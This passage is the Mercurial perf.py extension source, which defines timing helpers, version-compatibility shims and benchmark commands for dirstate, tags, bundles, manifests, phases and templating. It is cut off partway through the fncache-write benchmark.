util: allow lrucachedict to track cost of entries...
Gregory Szorc, r39603:ee087f0d (default)
# perf.py - performance test routines
'''helper extension to measure performance'''

# "historical portability" policy of perf.py:
#
# We have to do:
# - make perf.py "loadable" with as wide a range of Mercurial versions
#   as possible
#   This doesn't mean that perf commands work correctly with that Mercurial.
#   BTW, perf.py itself has been available since 1.1 (or eb240755386d).
# - make historical perf commands work correctly with as wide a range of
#   Mercurial versions as possible
#
# We have to do, if possible with reasonable cost:
# - make recent perf commands for historical features work correctly
#   with early Mercurial
#
# We don't have to do:
# - make perf commands for recent features work correctly with early
#   Mercurial

from __future__ import absolute_import
import functools
import gc
import os
import random
import struct
import sys
import threading
import time
from mercurial import (
    changegroup,
    cmdutil,
    commands,
    copies,
    error,
    extensions,
    mdiff,
    merge,
    revlog,
    util,
)

# for "historical portability":
# try to import modules separately (in dict order), and ignore
# failure, because these aren't available with early Mercurial
try:
    from mercurial import branchmap # since 2.5 (or bcee63733aad)
except ImportError:
    pass
try:
    from mercurial import obsolete # since 2.3 (or ad0d6c2b3279)
except ImportError:
    pass
try:
    from mercurial import registrar # since 3.7 (or 37d50250b696)
    dir(registrar) # forcibly load it
except ImportError:
    registrar = None
try:
    from mercurial import repoview # since 2.5 (or 3a6ddacb7198)
except ImportError:
    pass
try:
    from mercurial import scmutil # since 1.9 (or 8b252e826c68)
except ImportError:
    pass
try:
    from mercurial import pycompat
    getargspec = pycompat.getargspec # added to module after 4.5
except (ImportError, AttributeError):
    import inspect
    getargspec = inspect.getargspec

try:
    # 4.7+
    queue = pycompat.queue.Queue
except (AttributeError, ImportError):
    # <4.7.
    try:
        queue = pycompat.queue
    except (AttributeError, ImportError):
        queue = util.queue

try:
    from mercurial import logcmdutil
    makelogtemplater = logcmdutil.maketemplater
except (AttributeError, ImportError):
    try:
        makelogtemplater = cmdutil.makelogtemplater
    except (AttributeError, ImportError):
        makelogtemplater = None

# for "historical portability":
# define util.safehasattr forcibly, because util.safehasattr has been
# available since 1.9.3 (or 94b200a11cf7)
_undefined = object()
def safehasattr(thing, attr):
    return getattr(thing, attr, _undefined) is not _undefined
setattr(util, 'safehasattr', safehasattr)
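# Note: probing with a unique sentinel means only a genuinely missing
# attribute reads as absent; unlike Python 2's built-in hasattr(), this
# does not swallow unrelated exceptions raised by a property.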

# for "historical portability":
# define util.timer forcibly, because util.timer has been available
# since ae5d60bb70c9
if safehasattr(time, 'perf_counter'):
    util.timer = time.perf_counter
elif os.name == 'nt':
    util.timer = time.clock
else:
    util.timer = time.time

# for "historical portability":
# use locally defined empty option list, if formatteropts isn't
# available, because commands.formatteropts has been available since
# 3.2 (or 7a7eed5176a4), even though formatting itself has been
# available since 2.2 (or ae5f92e154d3)
formatteropts = getattr(cmdutil, "formatteropts",
                        getattr(commands, "formatteropts", []))

# for "historical portability":
# use locally defined option list, if debugrevlogopts isn't available,
# because commands.debugrevlogopts has been available since 3.7 (or
# 5606f7d0d063), even though cmdutil.openrevlog() has been available
# since 1.9 (or a79fea6b3e77).
revlogopts = getattr(cmdutil, "debugrevlogopts",
                     getattr(commands, "debugrevlogopts", [
    (b'c', b'changelog', False, (b'open changelog')),
    (b'm', b'manifest', False, (b'open manifest')),
    (b'', b'dir', False, (b'open directory manifest')),
]))

cmdtable = {}

# for "historical portability":
# define parsealiases locally, because cmdutil.parsealiases has been
# available since 1.5 (or 6252852b4332)
def parsealiases(cmd):
    return cmd.lstrip(b"^").split(b"|")
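# (in old-style command tables a leading "^" marked commands shown in the
# short help list; it is not part of the name or aliases, hence the lstrip)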

if safehasattr(registrar, 'command'):
    command = registrar.command(cmdtable)
elif safehasattr(cmdutil, 'command'):
    command = cmdutil.command(cmdtable)
    if b'norepo' not in getargspec(command).args:
        # for "historical portability":
        # wrap original cmdutil.command, because "norepo" option has
        # been available since 3.1 (or 75a96326cecb)
        _command = command
        def command(name, options=(), synopsis=None, norepo=False):
            if norepo:
                commands.norepo += b' %s' % b' '.join(parsealiases(name))
            return _command(name, list(options), synopsis)
else:
    # for "historical portability":
    # define "@command" annotation locally, because cmdutil.command
    # has been available since 1.9 (or 2daa5179e73f)
    def command(name, options=(), synopsis=None, norepo=False):
        def decorator(func):
            if synopsis:
                cmdtable[name] = func, list(options), synopsis
            else:
                cmdtable[name] = func, list(options)
            if norepo:
                commands.norepo += b' %s' % b' '.join(parsealiases(name))
            return func
        return decorator

try:
    import mercurial.registrar
    import mercurial.configitems
    configtable = {}
    configitem = mercurial.registrar.configitem(configtable)
    configitem(b'perf', b'presleep',
               default=mercurial.configitems.dynamicdefault,
    )
    configitem(b'perf', b'stub',
               default=mercurial.configitems.dynamicdefault,
    )
    configitem(b'perf', b'parentscount',
               default=mercurial.configitems.dynamicdefault,
    )
    configitem(b'perf', b'all-timing',
               default=mercurial.configitems.dynamicdefault,
    )
except (ImportError, AttributeError):
    pass

def getlen(ui):
    if ui.configbool(b"perf", b"stub", False):
        return lambda x: 1
    return len

def gettimer(ui, opts=None):
    """return a timer function and formatter: (timer, formatter)

    This function exists to gather the creation of formatter in a single
    place instead of duplicating it in all performance commands."""

    # enforce an idle period before execution to counteract power management
    # experimental config: perf.presleep
    time.sleep(getint(ui, b"perf", b"presleep", 1))

    if opts is None:
        opts = {}
    # redirect all to stderr unless buffer api is in use
    if not ui._buffers:
        ui = ui.copy()
        uifout = safeattrsetter(ui, b'fout', ignoremissing=True)
        if uifout:
            # for "historical portability":
            # ui.fout/ferr have been available since 1.9 (or 4e1ccd4c2b6d)
            uifout.set(ui.ferr)

    # get a formatter
    uiformatter = getattr(ui, 'formatter', None)
    if uiformatter:
        fm = uiformatter(b'perf', opts)
    else:
        # for "historical portability":
        # define formatter locally, because ui.formatter has been
        # available since 2.2 (or ae5f92e154d3)
        from mercurial import node
        class defaultformatter(object):
            """Minimized composition of baseformatter and plainformatter
            """
            def __init__(self, ui, topic, opts):
                self._ui = ui
                if ui.debugflag:
                    self.hexfunc = node.hex
                else:
                    self.hexfunc = node.short
            def __nonzero__(self):
                return False
            __bool__ = __nonzero__
            def startitem(self):
                pass
            def data(self, **data):
                pass
            def write(self, fields, deftext, *fielddata, **opts):
                self._ui.write(deftext % fielddata, **opts)
            def condwrite(self, cond, fields, deftext, *fielddata, **opts):
                if cond:
                    self._ui.write(deftext % fielddata, **opts)
            def plain(self, text, **opts):
                self._ui.write(text, **opts)
            def end(self):
                pass
        fm = defaultformatter(ui, b'perf', opts)

    # stub function, runs code only once instead of in a loop
    # experimental config: perf.stub
    if ui.configbool(b"perf", b"stub", False):
        return functools.partial(stub_timer, fm), fm

    # experimental config: perf.all-timing
    displayall = ui.configbool(b"perf", b"all-timing", False)
    return functools.partial(_timer, fm, displayall=displayall), fm

def stub_timer(fm, func, title=None):
    func()

def _timer(fm, func, title=None, displayall=False):
    gc.collect()
    results = []
    begin = util.timer()
    count = 0
    while True:
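        # Adaptive sampling: keep calling func() until we have at least 100
        # samples over 3 seconds of wall time, but give up after 10 seconds
        # once at least 3 samples exist.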
        ostart = os.times()
        cstart = util.timer()
        r = func()
        cstop = util.timer()
        ostop = os.times()
        count += 1
        a, b = ostart, ostop
        results.append((cstop - cstart, b[0] - a[0], b[1] - a[1]))
        if cstop - begin > 3 and count >= 100:
            break
        if cstop - begin > 10 and count >= 3:
            break

    fm.startitem()

    if title:
        fm.write(b'title', b'! %s\n', title)
    if r:
        fm.write(b'result', b'! result: %s\n', r)
    def display(role, entry):
        prefix = b''
        if role != b'best':
            prefix = b'%s.' % role
        fm.plain(b'!')
        fm.write(prefix + b'wall', b' wall %f', entry[0])
        fm.write(prefix + b'comb', b' comb %f', entry[1] + entry[2])
        fm.write(prefix + b'user', b' user %f', entry[1])
        fm.write(prefix + b'sys', b' sys %f', entry[2])
        fm.write(prefix + b'count', b' (%s of %d)', role, count)
        fm.plain(b'\n')
    results.sort()
    min_val = results[0]
    display(b'best', min_val)
    if displayall:
        max_val = results[-1]
        display(b'max', max_val)
        avg = tuple([sum(x) / count for x in zip(*results)])
        display(b'avg', avg)
        median = results[len(results) // 2]
        display(b'median', median)

# utilities for historical portability

def getint(ui, section, name, default):
    # for "historical portability":
    # ui.configint has been available since 1.9 (or fa2b596db182)
    v = ui.config(section, name, None)
    if v is None:
        return default
    try:
        return int(v)
    except ValueError:
        raise error.ConfigError((b"%s.%s is not an integer ('%s')")
                                % (section, name, v))

def safeattrsetter(obj, name, ignoremissing=False):
    """Ensure that 'obj' has the 'name' attribute before a subsequent setattr

    This function aborts if 'obj' lacks the 'name' attribute at runtime,
    so that removal of the attribute in a future Mercurial, which would
    invalidate the assumptions of a measurement, is not silently overlooked.

    The returned object can be used to (1) assign a new value to the
    attribute and (2) restore the attribute's original value.

    If 'ignoremissing' is true, a missing 'name' attribute does not cause
    an abort; this function returns None instead. This is useful for
    examining attributes that are not guaranteed to exist in all Mercurial
    versions.
    """
    if not util.safehasattr(obj, name):
        if ignoremissing:
            return None
        raise error.Abort((b"missing attribute %s of %s might break assumption"
                           b" of performance measurement") % (name, obj))

    origvalue = getattr(obj, name)
    class attrutil(object):
        def set(self, newvalue):
            setattr(obj, name, newvalue)
        def restore(self):
            setattr(obj, name, origvalue)

    return attrutil()
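# Example (hypothetical usage): temporarily redirect ui.fout, then put the
# original back:
#   fout = safeattrsetter(ui, b'fout', ignoremissing=True)
#   if fout:
#       fout.set(ui.ferr)
#       try:
#           pass  # run the measurement
#       finally:
#           fout.restore()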

# utilities to examine changes in each internal API

def getbranchmapsubsettable():
    # for "historical portability":
    # subsettable is defined in:
    # - branchmap since 2.9 (or 175c6fd8cacc)
    # - repoview since 2.5 (or 59a9f18d4587)
    for mod in (branchmap, repoview):
        subsettable = getattr(mod, 'subsettable', None)
        if subsettable:
            return subsettable

    # bisecting in bcee63733aad::59a9f18d4587 can reach here (both
    # branchmap and repoview modules exist, but subsettable attribute
    # doesn't)
    raise error.Abort((b"perfbranchmap not available with this Mercurial"),
                      hint=b"use 2.5 or later")

def getsvfs(repo):
    """Return appropriate object to access files under .hg/store
    """
    # for "historical portability":
    # repo.svfs has been available since 2.3 (or 7034365089bf)
    svfs = getattr(repo, 'svfs', None)
    if svfs:
        return svfs
    else:
        return getattr(repo, 'sopener')

def getvfs(repo):
    """Return appropriate object to access files under .hg
    """
    # for "historical portability":
    # repo.vfs has been available since 2.3 (or 7034365089bf)
    vfs = getattr(repo, 'vfs', None)
    if vfs:
        return vfs
    else:
        return getattr(repo, 'opener')

def repocleartagscachefunc(repo):
    """Return the function to clear tags cache according to repo internal API
    """
    if util.safehasattr(repo, b'_tagscache'): # since 2.0 (or 9dca7653b525)
        # in this case, setattr(repo, '_tagscache', None) or so isn't
        # the correct way to clear tags cache, because existing code paths
        # expect _tagscache to be a structured object.
        def clearcache():
            # _tagscache has been filteredpropertycache since 2.5 (or
            # 98c867ac1330), and delattr() can't work in such a case
            if b'_tagscache' in vars(repo):
                del repo.__dict__[b'_tagscache']
        return clearcache

    repotags = safeattrsetter(repo, b'_tags', ignoremissing=True)
    if repotags: # since 1.4 (or 5614a628d173)
        return lambda: repotags.set(None)

    repotagscache = safeattrsetter(repo, b'tagscache', ignoremissing=True)
    if repotagscache: # since 0.6 (or d7df759d0e97)
        return lambda: repotagscache.set(None)

    # Mercurial earlier than 0.6 (or d7df759d0e97) logically reaches
    # this point, but it isn't so problematic, because:
    # - repo.tags of such Mercurial isn't "callable", and repo.tags()
    #   in perftags() causes failure soon
    # - perf.py itself has been available since 1.1 (or eb240755386d)
    raise error.Abort((b"tags API of this hg command is unknown"))

# utilities to clear cache

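# A filecache-managed attribute caches its value in the (unfiltered) repo's
# __dict__ and records a stat entry in repo._filecache; both must be dropped
# so the next access really reloads from disk.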
def clearfilecache(repo, attrname):
    unfi = repo.unfiltered()
    if attrname in vars(unfi):
        delattr(unfi, attrname)
    unfi._filecache.pop(attrname, None)

# perf commands

@command(b'perfwalk', formatteropts)
def perfwalk(ui, repo, *pats, **opts):
    timer, fm = gettimer(ui, opts)
    m = scmutil.match(repo[None], pats, {})
    timer(lambda: len(list(repo.dirstate.walk(m, subrepos=[], unknown=True,
                                              ignored=False))))
    fm.end()

@command(b'perfannotate', formatteropts)
def perfannotate(ui, repo, f, **opts):
    timer, fm = gettimer(ui, opts)
    fc = repo[b'.'][f]
    timer(lambda: len(fc.annotate(True)))
    fm.end()

@command(b'perfstatus',
         [(b'u', b'unknown', False,
           b'ask status to look for unknown files')] + formatteropts)
def perfstatus(ui, repo, **opts):
    #m = match.always(repo.root, repo.getcwd())
    #timer(lambda: sum(map(len, repo.dirstate.status(m, [], False, False,
    #                                                False))))
    timer, fm = gettimer(ui, opts)
    timer(lambda: sum(map(len, repo.status(unknown=opts[b'unknown']))))
    fm.end()

@command(b'perfaddremove', formatteropts)
def perfaddremove(ui, repo, **opts):
    timer, fm = gettimer(ui, opts)
    try:
        oldquiet = repo.ui.quiet
        repo.ui.quiet = True
        matcher = scmutil.match(repo[None])
        opts[b'dry_run'] = True
        timer(lambda: scmutil.addremove(repo, matcher, b"", opts))
    finally:
        repo.ui.quiet = oldquiet
    fm.end()

def clearcaches(cl):
    # behave somewhat consistently across internal API changes
    if util.safehasattr(cl, b'clearcaches'):
        cl.clearcaches()
    elif util.safehasattr(cl, b'_nodecache'):
        from mercurial.node import nullid, nullrev
        cl._nodecache = {nullid: nullrev}
        cl._nodepos = None

@command(b'perfheads', formatteropts)
def perfheads(ui, repo, **opts):
    timer, fm = gettimer(ui, opts)
    cl = repo.changelog
    def d():
        len(cl.headrevs())
        clearcaches(cl)
    timer(d)
    fm.end()

@command(b'perftags', formatteropts)
def perftags(ui, repo, **opts):
    import mercurial.changelog
    import mercurial.manifest
    timer, fm = gettimer(ui, opts)
    svfs = getsvfs(repo)
    repocleartagscache = repocleartagscachefunc(repo)
    def t():
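        # replacing repo.changelog and repo.manifestlog throws away any
        # cached revision data, so every run re-reads tags from disk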
        repo.changelog = mercurial.changelog.changelog(svfs)
        repo.manifestlog = mercurial.manifest.manifestlog(svfs, repo)
        repocleartagscache()
        return len(repo.tags())
    timer(t)
    fm.end()

@command(b'perfancestors', formatteropts)
def perfancestors(ui, repo, **opts):
    timer, fm = gettimer(ui, opts)
    heads = repo.changelog.headrevs()
    def d():
        for a in repo.changelog.ancestors(heads):
            pass
    timer(d)
    fm.end()

@command(b'perfancestorset', formatteropts)
def perfancestorset(ui, repo, revset, **opts):
    timer, fm = gettimer(ui, opts)
    revs = repo.revs(revset)
    heads = repo.changelog.headrevs()
    def d():
        s = repo.changelog.ancestors(heads)
        for rev in revs:
            rev in s
    timer(d)
    fm.end()

@command(b'perfbookmarks', formatteropts)
def perfbookmarks(ui, repo, **opts):
    """benchmark parsing bookmarks from disk to memory"""
    timer, fm = gettimer(ui, opts)
    def d():
        clearfilecache(repo, b'_bookmarks')
        repo._bookmarks
    timer(d)
    fm.end()

@command(b'perfbundleread', formatteropts, b'BUNDLE')
def perfbundleread(ui, repo, bundlepath, **opts):
    """Benchmark reading of bundle files.

    This command is meant to isolate the I/O part of bundle reading as
    much as possible.
    """
    from mercurial import (
        bundle2,
        exchange,
        streamclone,
    )

    def makebench(fn):
        def run():
            with open(bundlepath, b'rb') as fh:
                bundle = exchange.readbundle(ui, fh, bundlepath)
                fn(bundle)

        return run

    def makereadnbytes(size):
        def run():
            with open(bundlepath, b'rb') as fh:
                bundle = exchange.readbundle(ui, fh, bundlepath)
                while bundle.read(size):
                    pass

        return run

    def makestdioread(size):
        def run():
            with open(bundlepath, b'rb') as fh:
                while fh.read(size):
                    pass

        return run

    # bundle1

    def deltaiter(bundle):
        for delta in bundle.deltaiter():
            pass

    def iterchunks(bundle):
        for chunk in bundle.getchunks():
            pass

    # bundle2

    def forwardchunks(bundle):
        for chunk in bundle._forwardchunks():
            pass

    def iterparts(bundle):
        for part in bundle.iterparts():
            pass

    def iterpartsseekable(bundle):
        for part in bundle.iterparts(seekable=True):
            pass

    def seek(bundle):
        for part in bundle.iterparts(seekable=True):
            part.seek(0, os.SEEK_END)

    def makepartreadnbytes(size):
        def run():
            with open(bundlepath, b'rb') as fh:
                bundle = exchange.readbundle(ui, fh, bundlepath)
                for part in bundle.iterparts():
                    while part.read(size):
                        pass

        return run

    benches = [
        (makestdioread(8192), b'read(8k)'),
        (makestdioread(16384), b'read(16k)'),
        (makestdioread(32768), b'read(32k)'),
        (makestdioread(131072), b'read(128k)'),
    ]

    with open(bundlepath, b'rb') as fh:
        bundle = exchange.readbundle(ui, fh, bundlepath)

        if isinstance(bundle, changegroup.cg1unpacker):
            benches.extend([
                (makebench(deltaiter), b'cg1 deltaiter()'),
                (makebench(iterchunks), b'cg1 getchunks()'),
                (makereadnbytes(8192), b'cg1 read(8k)'),
                (makereadnbytes(16384), b'cg1 read(16k)'),
                (makereadnbytes(32768), b'cg1 read(32k)'),
                (makereadnbytes(131072), b'cg1 read(128k)'),
            ])
        elif isinstance(bundle, bundle2.unbundle20):
            benches.extend([
                (makebench(forwardchunks), b'bundle2 forwardchunks()'),
                (makebench(iterparts), b'bundle2 iterparts()'),
                (makebench(iterpartsseekable), b'bundle2 iterparts() seekable'),
                (makebench(seek), b'bundle2 part seek()'),
                (makepartreadnbytes(8192), b'bundle2 part read(8k)'),
                (makepartreadnbytes(16384), b'bundle2 part read(16k)'),
                (makepartreadnbytes(32768), b'bundle2 part read(32k)'),
                (makepartreadnbytes(131072), b'bundle2 part read(128k)'),
            ])
        elif isinstance(bundle, streamclone.streamcloneapplier):
            raise error.Abort(b'stream clone bundles not supported')
        else:
            raise error.Abort(b'unhandled bundle type: %s' % type(bundle))

    for fn, title in benches:
        timer, fm = gettimer(ui, opts)
        timer(fn, title=title)
        fm.end()

@command(b'perfchangegroupchangelog', formatteropts +
         [(b'', b'version', b'02', b'changegroup version'),
          (b'r', b'rev', b'', b'revisions to add to changegroup')])
def perfchangegroupchangelog(ui, repo, version=b'02', rev=None, **opts):
    """Benchmark producing a changelog group for a changegroup.

    This measures the time spent processing the changelog during a
    bundle operation. This occurs during `hg bundle` and on a server
    processing a `getbundle` wire protocol request (handles clones
    and pull requests).

    By default, all revisions are added to the changegroup.
    """
    cl = repo.changelog
    nodes = [cl.lookup(r) for r in repo.revs(rev or b'all()')]
    bundler = changegroup.getbundler(version, repo)

    def d():
        state, chunks = bundler._generatechangelog(cl, nodes)
        for chunk in chunks:
            pass

    timer, fm = gettimer(ui, opts)

    # Terminal printing can interfere with timing. So disable it.
    with ui.configoverride({(b'progress', b'disable'): True}):
        timer(d)

    fm.end()

@command(b'perfdirs', formatteropts)
def perfdirs(ui, repo, **opts):
    timer, fm = gettimer(ui, opts)
    dirstate = repo.dirstate
    b'a' in dirstate
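    # the membership test above forces the dirstate to be read and parsed
    # up front, so the timed function below measures hasdir() alone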
    def d():
        dirstate.hasdir(b'a')
        del dirstate._map._dirs
    timer(d)
    fm.end()

@command(b'perfdirstate', formatteropts)
def perfdirstate(ui, repo, **opts):
    timer, fm = gettimer(ui, opts)
    b"a" in repo.dirstate
    def d():
        repo.dirstate.invalidate()
        b"a" in repo.dirstate
    timer(d)
    fm.end()

@command(b'perfdirstatedirs', formatteropts)
def perfdirstatedirs(ui, repo, **opts):
    timer, fm = gettimer(ui, opts)
    b"a" in repo.dirstate
    def d():
        repo.dirstate.hasdir(b"a")
        del repo.dirstate._map._dirs
    timer(d)
    fm.end()

@command(b'perfdirstatefoldmap', formatteropts)
def perfdirstatefoldmap(ui, repo, **opts):
    timer, fm = gettimer(ui, opts)
    dirstate = repo.dirstate
    b'a' in dirstate
    def d():
        dirstate._map.filefoldmap.get(b'a')
        del dirstate._map.filefoldmap
    timer(d)
    fm.end()

@command(b'perfdirfoldmap', formatteropts)
def perfdirfoldmap(ui, repo, **opts):
    timer, fm = gettimer(ui, opts)
    dirstate = repo.dirstate
    b'a' in dirstate
    def d():
        dirstate._map.dirfoldmap.get(b'a')
        del dirstate._map.dirfoldmap
        del dirstate._map._dirs
    timer(d)
    fm.end()

@command(b'perfdirstatewrite', formatteropts)
def perfdirstatewrite(ui, repo, **opts):
    timer, fm = gettimer(ui, opts)
    ds = repo.dirstate
    b"a" in ds
    def d():
        ds._dirty = True
        ds.write(repo.currenttransaction())
    timer(d)
    fm.end()

@command(b'perfmergecalculate',
         [(b'r', b'rev', b'.', b'rev to merge against')] + formatteropts)
def perfmergecalculate(ui, repo, rev, **opts):
    timer, fm = gettimer(ui, opts)
    wctx = repo[None]
    rctx = scmutil.revsingle(repo, rev, rev)
    ancestor = wctx.ancestor(rctx)
    # we don't want working dir files to be stat'd in the benchmark, so
    # prime that cache
    wctx.dirty()
    def d():
        # acceptremote is True because we don't want prompts in the middle of
        # our benchmark
        merge.calculateupdates(repo, wctx, rctx, [ancestor], False, False,
                               acceptremote=True, followcopies=True)
    timer(d)
    fm.end()

@command(b'perfpathcopies', [], b"REV REV")
def perfpathcopies(ui, repo, rev1, rev2, **opts):
    timer, fm = gettimer(ui, opts)
    ctx1 = scmutil.revsingle(repo, rev1, rev1)
    ctx2 = scmutil.revsingle(repo, rev2, rev2)
    def d():
        copies.pathcopies(ctx1, ctx2)
    timer(d)
    fm.end()

@command(b'perfphases',
         [(b'', b'full', False, b'include file reading time too'),
          ], b"")
def perfphases(ui, repo, **opts):
    """benchmark phasesets computation"""
    timer, fm = gettimer(ui, opts)
    _phases = repo._phasecache
    full = opts.get(b'full')
    def d():
        phases = _phases
        if full:
            clearfilecache(repo, b'_phasecache')
            phases = repo._phasecache
        phases.invalidate()
        phases.loadphaserevs(repo)
    timer(d)
    fm.end()

@command(b'perfphasesremote',
         [], b"[DEST]")
def perfphasesremote(ui, repo, dest=None, **opts):
    """benchmark time needed to analyse phases of the remote server"""
    from mercurial.node import (
        bin,
    )
    from mercurial import (
        exchange,
        hg,
        phases,
    )
    timer, fm = gettimer(ui, opts)

    path = ui.paths.getpath(dest, default=(b'default-push', b'default'))
    if not path:
        raise error.Abort((b'default repository not configured!'),
                          hint=(b"see 'hg help config.paths'"))
    dest = path.pushloc or path.loc
    branches = (path.branch, opts.get(b'branch') or [])
    ui.status((b'analysing phase of %s\n') % util.hidepassword(dest))
    revs, checkout = hg.addbranchrevs(repo, repo, branches, opts.get(b'rev'))
    other = hg.peer(repo, opts, dest)

    # easier to perform discovery through the operation
    op = exchange.pushoperation(repo, other)
    exchange._pushdiscoverychangeset(op)

    remotesubset = op.fallbackheads

    with other.commandexecutor() as e:
        remotephases = e.callcommand(b'listkeys',
                                     {b'namespace': b'phases'}).result()
    del other
    publishing = remotephases.get(b'publishing', False)
    if publishing:
        ui.status((b'publishing: yes\n'))
    else:
        ui.status((b'publishing: no\n'))

    nodemap = repo.changelog.nodemap
    nonpublishroots = 0
    for nhex, phase in remotephases.iteritems():
        if nhex == b'publishing': # ignore data related to publish option
            continue
        node = bin(nhex)
        if node in nodemap and int(phase):
            nonpublishroots += 1
    ui.status((b'number of roots: %d\n') % len(remotephases))
    ui.status((b'number of known non public roots: %d\n') % nonpublishroots)
    def d():
        phases.remotephasessummary(repo,
                                   remotesubset,
                                   remotephases)
    timer(d)
    fm.end()

@command(b'perfmanifest', [
         (b'm', b'manifest-rev', False, b'Look up a manifest node revision'),
         (b'', b'clear-disk', False, b'clear on-disk caches too'),
         ], b'REV|NODE')
def perfmanifest(ui, repo, rev, manifest_rev=False, clear_disk=False, **opts):
    """benchmark the time to read a manifest from disk and return a usable
    dict-like object

    Manifest caches are cleared before retrieval."""
    timer, fm = gettimer(ui, opts)
    if not manifest_rev:
        ctx = scmutil.revsingle(repo, rev, rev)
        t = ctx.manifestnode()
    else:
        from mercurial.node import bin

        if len(rev) == 40:
            t = bin(rev)
        else:
            try:
                rev = int(rev)

                if util.safehasattr(repo.manifestlog, b'getstorage'):
                    t = repo.manifestlog.getstorage(b'').node(rev)
                else:
                    t = repo.manifestlog._revlog.lookup(rev)
            except ValueError:
                raise error.Abort(b'manifest revision must be integer or full '
                                  b'node')
    def d():
        repo.manifestlog.clearcaches(clear_persisted_data=clear_disk)
        repo.manifestlog[t].read()
    timer(d)
    fm.end()

@command(b'perfchangeset', formatteropts)
def perfchangeset(ui, repo, rev, **opts):
    timer, fm = gettimer(ui, opts)
    n = scmutil.revsingle(repo, rev).node()
    def d():
        repo.changelog.read(n)
        #repo.changelog._cache = None
    timer(d)
    fm.end()

@command(b'perfindex', formatteropts)
def perfindex(ui, repo, **opts):
    import mercurial.revlog
    timer, fm = gettimer(ui, opts)
    mercurial.revlog._prereadsize = 2**24 # disable lazy parser in old hg
    n = repo[b"tip"].node()
    svfs = getsvfs(repo)
    def d():
        cl = mercurial.revlog.revlog(svfs, b"00changelog.i")
        cl.rev(n)
    timer(d)
    fm.end()

@command(b'perfstartup', formatteropts)
def perfstartup(ui, repo, **opts):
    timer, fm = gettimer(ui, opts)
    cmd = sys.argv[0]
    def d():
        if os.name != 'nt':
            os.system(b"HGRCPATH= %s version -q > /dev/null" % cmd)
        else:
            os.environ['HGRCPATH'] = ' '
            os.system(b"%s version -q > NUL" % cmd)
    timer(d)
    fm.end()

@command(b'perfparents', formatteropts)
def perfparents(ui, repo, **opts):
    timer, fm = gettimer(ui, opts)
    # control the number of commits perfparents iterates over
    # experimental config: perf.parentscount
    count = getint(ui, b"perf", b"parentscount", 1000)
    if len(repo.changelog) < count:
        raise error.Abort(b"repo needs %d commits for this test" % count)
    repo = repo.unfiltered()
    nl = [repo.changelog.node(i) for i in xrange(count)]
    def d():
        for n in nl:
            repo.changelog.parents(n)
    timer(d)
    fm.end()

@command(b'perfctxfiles', formatteropts)
def perfctxfiles(ui, repo, x, **opts):
    x = int(x)
    timer, fm = gettimer(ui, opts)
    def d():
        len(repo[x].files())
    timer(d)
    fm.end()

@command(b'perfrawfiles', formatteropts)
def perfrawfiles(ui, repo, x, **opts):
    x = int(x)
    timer, fm = gettimer(ui, opts)
    cl = repo.changelog
    def d():
        len(cl.read(x)[3])
    timer(d)
    fm.end()

@command(b'perflookup', formatteropts)
def perflookup(ui, repo, rev, **opts):
    timer, fm = gettimer(ui, opts)
    timer(lambda: len(repo.lookup(rev)))
    fm.end()

@command(b'perflinelogedits',
         [(b'n', b'edits', 10000, b'number of edits'),
          (b'', b'max-hunk-lines', 10, b'max lines in a hunk'),
          ], norepo=True)
def perflinelogedits(ui, **opts):
    from mercurial import linelog

    edits = opts[b'edits']
    maxhunklines = opts[b'max_hunk_lines']

    maxb1 = 100000
    random.seed(0)
    randint = random.randint
    currentlines = 0
    arglist = []
    for rev in xrange(edits):
        a1 = randint(0, currentlines)
        a2 = randint(a1, min(currentlines, a1 + maxhunklines))
        b1 = randint(0, maxb1)
        b2 = randint(b1, b1 + maxhunklines)
        currentlines += (b2 - b1) - (a2 - a1)
        arglist.append((rev, a1, a2, b1, b2))

    def d():
        ll = linelog.linelog()
        for args in arglist:
            ll.replacelines(*args)

    timer, fm = gettimer(ui, opts)
    timer(d)
    fm.end()

@command(b'perfrevrange', formatteropts)
def perfrevrange(ui, repo, *specs, **opts):
    timer, fm = gettimer(ui, opts)
    revrange = scmutil.revrange
    timer(lambda: len(revrange(repo, specs)))
    fm.end()

@command(b'perfnodelookup', formatteropts)
def perfnodelookup(ui, repo, rev, **opts):
    timer, fm = gettimer(ui, opts)
    import mercurial.revlog
    mercurial.revlog._prereadsize = 2**24 # disable lazy parser in old hg
    n = scmutil.revsingle(repo, rev).node()
    cl = mercurial.revlog.revlog(getsvfs(repo), b"00changelog.i")
    def d():
        cl.rev(n)
        clearcaches(cl)
    timer(d)
    fm.end()

@command(b'perflog',
         [(b'', b'rename', False, b'ask log to follow renames')
          ] + formatteropts)
def perflog(ui, repo, rev=None, **opts):
    if rev is None:
        rev = []
    timer, fm = gettimer(ui, opts)
    ui.pushbuffer()
    timer(lambda: commands.log(ui, repo, rev=rev, date=b'', user=b'',
                               copies=opts.get(b'rename')))
    ui.popbuffer()
    fm.end()

@command(b'perfmoonwalk', formatteropts)
def perfmoonwalk(ui, repo, **opts):
    """benchmark walking the changelog backwards

    This also loads the changelog data for each revision in the changelog.
    """
    timer, fm = gettimer(ui, opts)
    def moonwalk():
        for i in repo.changelog.revs(start=(len(repo) - 1), stop=-1):
            ctx = repo[i]
            ctx.branch() # read changelog data (in addition to the index)
    timer(moonwalk)
    fm.end()

@command(b'perftemplating',
         [(b'r', b'rev', [], b'revisions to run the template on'),
          ] + formatteropts)
def perftemplating(ui, repo, testedtemplate=None, **opts):
    """test the rendering time of a given template"""
    if makelogtemplater is None:
        raise error.Abort((b"perftemplating not available with this Mercurial"),
                          hint=b"use 4.3 or later")

    nullui = ui.copy()
    nullui.fout = open(os.devnull, b'wb')
    nullui.disablepager()
    revs = opts.get(b'rev')
    if not revs:
        revs = [b'all()']
    revs = list(scmutil.revrange(repo, revs))

    defaulttemplate = (b'{date|shortdate} [{rev}:{node|short}]'
                       b' {author|person}: {desc|firstline}\n')
    if testedtemplate is None:
        testedtemplate = defaulttemplate
    displayer = makelogtemplater(nullui, repo, testedtemplate)
    def format():
        for r in revs:
            ctx = repo[r]
            displayer.show(ctx)
            displayer.flush(ctx)

    timer, fm = gettimer(ui, opts)
    timer(format)
    fm.end()

@command(b'perfcca', formatteropts)
def perfcca(ui, repo, **opts):
    timer, fm = gettimer(ui, opts)
    timer(lambda: scmutil.casecollisionauditor(ui, False, repo.dirstate))
    fm.end()

@command(b'perffncacheload', formatteropts)
def perffncacheload(ui, repo, **opts):
    timer, fm = gettimer(ui, opts)
    s = repo.store
    def d():
        s.fncache._load()
    timer(d)
    fm.end()

@command(b'perffncachewrite', formatteropts)
def perffncachewrite(ui, repo, **opts):
    timer, fm = gettimer(ui, opts)
    s = repo.store
    lock = repo.lock()
    s.fncache._load()
    tr = repo.transaction(b'perffncachewrite')
